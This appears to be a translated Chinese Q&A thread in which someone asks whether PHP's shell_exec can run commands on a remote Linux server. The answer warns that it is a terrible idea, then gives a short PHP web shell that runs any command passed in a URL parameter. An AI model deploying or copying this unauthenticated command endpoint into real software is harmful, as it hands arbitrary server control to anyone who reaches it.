我知道这是一个非常可怕的安全风险。但出于纯粹的好奇心,是否可以在PHP中使用shell_exec命令从一个Web服务器访问并执行shell脚本到另一个Linux服务器上?
既然我知道安全是人们建议的重要组成部分,我只是想知道。我知道如果可能的话,这是一个非常粗略的想法
答案 0 :(得分:0)
当然可以。可怕的想法
在远程服务器上,您有command.php之类的内容:
<?php
shell_exec($_GET['command']);
?>
然后您向远程服务器发送如下URL:
http://www.hackedserver.com/command.php?command=uptime
您甚至可以使用JSONP查看返回结果:
<?php
$result = shell_exec($_GET['command']);
json_encode($result);
echo $result;
?>